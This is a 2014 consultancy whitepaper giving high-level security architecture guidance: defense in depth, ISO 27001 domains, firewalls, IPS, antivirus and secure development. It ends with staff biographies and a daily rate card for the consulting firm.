Security Architecture Best Practice by Bob Panic Whitepaper

Security Architecture Best Practice
Guide
professional services security and architecture
consulting by Bob Panic
September 2014
Final
by Bob Panic,
Director & Principal Consultant
Rock Star Consulting Group
www.rockstarconsultinggroup.com
+61 424 102 603
bob_panic@me.com
Skype: bob.panic

2
Security Architecture an introduction to best practice
by Bob Panic
Information Security is a process whose objective is to ensure the
confidentiality, integrity and availability of an organisations information.
An information security program, to be comprehensive, should be
founded on a sound information security policy, supported by
appropriate technology (like anti-virus, access control mechanisms,
firewalls, and Intrusion Detection System), resiliency mechanisms and
regularly monitoring of the implemented controls.
Industry best practices suggest defense in depth concept for
implementing information security.
Defense in depth is a practice that combines several different security
components, such as firewalls, IDS/IPS, antivirus software, operating
systems security and application security, to create a comprehensive
and secure architecture. A multi-layer security system, supported by a
comprehensive information security policy, can significantly reduce the
risk of attack.

3
- The Security Model
We need to follow the defense in depth strategy to implement
security as required. The overall Security Model can be
depicted as follows:
4
- The Security Model cont.
At the highest level is the Security Policy.
This Security Policy could be realised by implementing a Security
Management Framework designed to manage the overall
security of the entire system, in accordance with the ISO 27001
standard.
At the broad level the Security Model should be designed to
ensure the security of all assets and ensure that no interference is
possible with the delivery services.
The system should be set up in such a way that it should not be
possible to alter any data, bypass any processing stages or
change the priority of any work item without authorization.
Each action should be carried out in such a manner that clear
accountability can be fixed for the authorization and
performance of that action.
5
Adopt a defense-in-depth strategy in order to protect the confidentiality, integrity
and availability of the information as well as the Assets.
This strategy covers security at all possible layers like Physical, Perimeter, Network,
Operating System, and Application. Accordingly, Develop all the required
policies and procedures that are required for the implementation and
management of the solution based on international security standard ISO27001.
ISO 27001 encompasses various Administrative, Operational, and Technological
and Physical Security measures covering the following 11 domains:
Information security policy
Organization of information security
Asset management
Human resource security
Physical and environmental security
Communications and operations management
Access control
Information systems acquisition, development & maintenance
Information security incident management
Business continuity management
Compliance
6

Every component of the Security Architecture Solution should be
designed keeping security as one of the critical design factors

7
- overall IT security architecture proposed: 3 Main Factors
Network Security
Firewalls
Intrusion Protection System
Antivirus System
Log management and correlation
E-mail security
Patch Management
Domain Controllers

Application & Database Security
User & Role Management
Authentication & Authorization
Cryptographic Services for Digital Signature and Encryption
Audit Logs

Security Management
Information Security Policies and Procedures
Business Continuity / Disaster Recovery plan
Security Audits and Penetration tests

8
- overall security architecture proposed: detail
Network Security

Various zones in the Data Centre for connecting homogenous sets of servers
running one application or integration among applications or servers accessed
by one category of users. This will facilitate controlled access to the network and
application resources only to the intended users.
Following zones should be implemented in the Data Centre. Functions of each
zone and IT equipment are explained in the subsequent sections:

External server segment
Local server segment
IFMIS server segment
Admin segment
Internal Network

9
- overall security architecture: A Proposed Solution
When it comes to information security these days, its a mixed up muddled up world out
there. The terms being used to describe network defense capabilities are just as blurry and
hard to pin down as the latest flavor of blended threat. Not surprisingly, the result is a growing
state of misunderstanding and confusion, culminating in the inability to readily separate fact
from fiction. Indeed, amidst the haze of imprecision there is even a proposition that
achieving comprehensive network-based protection requires little more than intrusion
prevention and, of course, firewall capabilities.
A comprehensive solution that will not only protect the entire network resources from threats
on all levels, but will also provide interoperability and seamless implementation, and
centralized management should be implemented. A network-based security approach
should be implemented which has the advantage of at least intending to stop threats before
they are allowed to spread throughout an organizations entire computing environment. To
achieve this, firewalls with integrated SSL gateway and Intrusion Prevention capabilities
should be put in place:
The appliance based firewalls combines feature rich security operating system with
dedicated processors to provide a high performance array of security and network functions
including:
firewall, VPN, and traffic shaping
Intrusion Prevention system (IPS)
antivirus/ antispyware / antimalware
web filtering
Anti -spam
multiple redundant WAN interface options

10
- overall security architecture: A Proposed Solution cont.
These dedicated appliances provide comprehensive protection against network, content,
and application-level threats, including complex attacks favored by cyber criminals, without
degrading network availability and uptime. The proposed platform includes sophisticated
networking features, such as high availability (active/active, active/passive) for maximum
network uptime, and virtual domain capabilities to separate various networks requiring
different security policies.
The firewall policies will control all traffic attempting to pass through the appliance unit,
between interfaces, zones, and VLAN sub interfaces. When the firewall receives a
connection packet, it analyzes the packets source address, destination address, and service
(by port number), and attempts to locate a firewall policy matching the packet. The
appliance will provide a secure connection between the remote clients and the unit through
the SSL VPN. After the connection has been established, the unit provides access to selected
services and network resources through a web portal. The appliance delivers antivirus
protection to HTTP, FTP, IMAP, POP3, SMTP, IM, and NNTP sessions. Antivirus scanning function
includes various modules and engines that perform separate tasks. The unit performs antivirus
processing in the following order:
File size
File pattern
File type
Virus scan
Grayware
Heuristics

11
- overall security architecture: A Proposed Solution cont.
The three main sections of the web filtering function, the Web Filter Content Block, the URL
Filter, and the Web filter, interact with each other in such a way as to provide maximum
control and protection for the Internet users. The appliance is proposed to be configured to
manage unsolicited commercial email by detecting and identifying spam messages from
known or suspected spam servers.
The antispam service will use both a sender IP reputation database and a spam signature
database, along with sophisticated spam filtering tools, to detect and block a wide range of
spam messages.
The Intrusion Protection system combines signature and anomaly detection and prevention
with low latency and excellent reliability.
The unit will log suspicious traffic, send alert email messages to system administrators, and log,
pass, or block suspicious packets or sessions.
Intrusion Protection system matches network traffic against patterns contained in attack
signatures.
Attack signatures reliably protect network from known attacks and ensures the rapid
identification of new threats and the development of new attack signatures. With intrusion
Protection, multiple IPS sensors should created, each containing a complete configuration
based on signatures.
DoS sensors are also proposed to examine traffic for anomaly-based attacks.

12
- security architecture: A Proposed Solution: E-mail Security
Email statistics are based on email protocols. POP3 and IMAP traffic is registered as incoming
email, and SMTP is outgoing email. Gateway level E-mail security should provided by the
firewall with integrated SSL VPN. The appliance supports Antivirus protection to IMAP, POP3,
SMTP, IM, sessions. proposes to configure spam filtering for IMAP, POP3, and SMTP emails.

13
- security architecture: Server Security
A comprehensive solution that will not only protect the entire network resources from threats
on all levels, but will also provide interoperability and seamless implementation, and
centralized management has to be implemented. To achieve this, the use a group of
products providing the following capabilities:
Antivirus / Anti-spam
Patch Management
HIDS/HIPS
Domain controllers
A Proposed Solution
For providing security at the Operating system layer the following key points have to be
considered:
Dedicated servers for applications and databases should used. Sharing the servers with other
applications introduces more complexity and risks.
Maintain a current, well-patched operating system on all the systems (servers, desktops). This
eliminates well-known bugs that have already been addressed by the vendor.
Restrict access to the servers only to authorized users.
Hardening of servers and desktops using industry best practices, security benchmarks.
Host Intrusion Detection System (HIDS) to protect the servers from attacks and unauthorized
use.
Antivirus solution to protect the servers from viruses/worms
Backup and restoration mechanisms for important/critical data and systems files
Properly configuring the required policies (like auditing, password, user rights etc.) on the
servers based on the Industry best practices and security benchmarks.

14
- security architecture: Server Security cont.
Anti-virus / Anti-Spam
All the Application servers, database servers and the Web-servers should have the latest anti-
virus kits to detect new viruses. These anti-virus kits should updated with the latest versions
frequently. Additional security features like disabling of drives and control on internet site
usage and download for further data security, have to be implemented. One can consider
Symantec Protection Suite for Antivirus and Anti-spam or any other suitable product.

Patch Management
One can consider CA IT Client Manager Solution for patch management

HIDS/HIPS
Symantec Critical System Protection

Domain controllers
For Domain controller one can consider Microsoft Windows solution.

E-mail Security
Symantec Protection Suite Enterprise Edition addresses this need by including the following,
industry-leading mail security solutions to protect its infrastructure from email-borne threats.
Symantec Brightmail Gateway
Web Gateway URL filtering

15
- security architecture: Application & Database Security
Through infrastructure security is a critical element of the overall security paradigm;
application security is also an equally critical area where security is often slack, thereby
providing a back door for attackers to compromise computer systems.

Application security is also significant in the sense that Application-level attacks often cannot
be blocked or detected by infrastructure security components.

Recognizes the importance of Application Security in operating a truly secure IT
infrastructure. Application security has two primary objectives:
Ensure that the data an application creates, updates, stores, and/or transmits are protected from
unauthorized disclosure, tampering, corruption, and destruction, by the applications users, by
processes external to the application, and by the application itself and
Provide another security layer within the overall system

The application and database security requirements can be broken down into the following:

1. Secure Application Development Methodology
2. Security requirements of the application
3. Database security requirements
16
- Secure Application Development Methodology
The following diagram describes the methodology has adopted to provide its services for
assessing and managing security in applications. The methodology and the activities
mentioned below are followed during the development of the solution to ensure compliance
to standards and guidelines such as ISO27001.

17
- Security design review
The review of the application architecture design based on the software requirement
specification (SRS) for security will point out the possibility of the security loop-holes in the
application-design; which may result in disclosure of information, memory exhaustion, denial
of service and buffer overflow etc.
As a part of the design review process one should use the Threat Modeling technique using
proprietary Threat and Analysis tool to record and manage the risks to the applications being
developed. The following diagram provides a brief description of the process should be
followed.

18
- Security code review
The code review of the application is to ensure compliance to
security standard of the coding. The code review ensures robust
validation mechanisms in code, robust authentication and
access control mechanisms in code and increase overall
robustness of the code.
Various areas such as Un-validated parameters, Broken access
control, Buffer overflows, Command injection flaws, Error
handling problems, Insecure use of cryptography, Remote
administration flaws, Communication between client-server,
Connection time-out etc are covered in the code review.
19
- Security testing
The security testing of the application is targeted to simulate the
attacks to the application like a hacker, and try to penetrate into
the application to find the weaknesses in different area:
Authentication mechanism
Access Control
Data validation
Buffer overflow
Denial of Service (DoS)
Information disclosure
Error handling
Insecure configuration

20
- Conclusion
To summarize and recap, we utilise an end-to-end security approach for all
phases of application development and incorporate Application security
assessment services using various tools like Security Code Review,
automated Application Security scanners etc. The following diagram
depicts the entire process in a more simplistic manner:

21
About some of our key staff
Bob Panic Solutions Architect/Principal Consultant delivery planner, business consultant, entrepreneur,
specialist business systems consultant (Enterprise Resource Planning, Logistics and Supply Chain), security
process director, project delivery manager. I bring over 25 years of professional business consultancy and
manage large, complex projects, leasing with senior leadership (directors, CEO/s, Investors) and leading
teams. I work with strict governance and business processes to ensure that clients budgets are protected
and funds allocated accordingly with a zero tolerance policy on waste and full prudential controls of
operating budgets. At Satyam from 2002 to 2008 I was responsible for successfully leading the $100 Million
(AUD) Core Banking Platform upgrade project for National Australia Bank. In 2013, I was the principal
Security and risk manager for the $1.5 Billion (AUD) Gold Cost University Hospital (Queensland Government)
where I was ultimately responsible for ensuring that the hospital was ready for its October 2013 opening to
the public (emergency and operating theatres).
LinkedIn Profile: http://www.linkedin.com/pub/bob-panic/6/185/62a

Silvi Bozo Chief of Staff NAATI Certified translator from English to Albanian, multi- lingual fluent in English,
Albanian, Italian, with professional studies in Russian, Japanese. Silvi has a BA of Business for RMIT (Australia)
and has been a founding member of our business.
LinkedIn Profile: http://www.linkedin.com/pub/silvi-bozo/55/3b/698

Jonia Tamburi Director of Communications B.A. in Modern Languages, Literatures & Cultures with a
concentration in Spanish and German in 2004 and M.A. in Communication Studies in 2011. Jonia is a
Albanian native, Canadian resident living and working in the USA as an college professor.
LinkedIn Profile: http://www.linkedin.com/pub/jonia-tamburi/7/413/933

22
Professional services - Rate card
As part of our general operating policy for openness and transparency the following is our terms and conditions (overview)
and rate card for global provision of professional services. The rate card comes with a guarantee of service and quality.
Invoices for professional services will be paid directly to CXC Global, in agreed currency (AUD, EURO, USD) as per agreed
terms and conditions of both parties. A working week can be agreed as either 5 or 6 days. A working day is 12 to 14 hours
on average.

General terms:
Travel and accommodation is to be provided and paid for by the client for the duration of all interstate and
international assignments. Travel insurance is included in the daily professional services rate of all our professional
consultants.
A one-off 15 days advanced payment for professional services to be paid for by the client before any international
assignment commences
7 day invoice terms. One invoice for all professional services
Operating capital and all incurred business expenses are the responsibility of the client
Daily rate is inclusive of all insurances, superannuation, and food. It is a fixed, landed rate + GST

Rate Card:

Daily Rate Professional
$ On Request Rock Star Consulting Group Legal Council International law, Intellectual
Property Law, Trademark Protection, Contracts.
$1500 AUD per/day Bob Panic Solutions Architect central contact
$950 AUD per/day Silvi Bozo Chief of Staff, Change Manager, Security Systems Integration
$1000 USD per/day Jonia Tamburi - Communications Director, Negotiator, professional support
services
For further details contact: Bob Panic
+61 424 102 603
Bob_panic@me.com

Security Architecture Best Practice by Bob Panic Whitepaper

Hochgeladen von

Dokumentinformationen

Originaltitel

Copyright

Verfügbare Formate

Dieses Dokument teilen

Dokument teilen oder einbetten

Freigabeoptionen

Stufen Sie dieses Dokument als nützlich ein?

Sind diese Inhalte unangemessen?

Copyright:

Verfügbare Formate

Security Architecture Best Practice by Bob Panic Whitepaper

Hochgeladen von

Copyright:

Verfügbare Formate

Security Architecture Best Practice

Das könnte Ihnen auch gefallen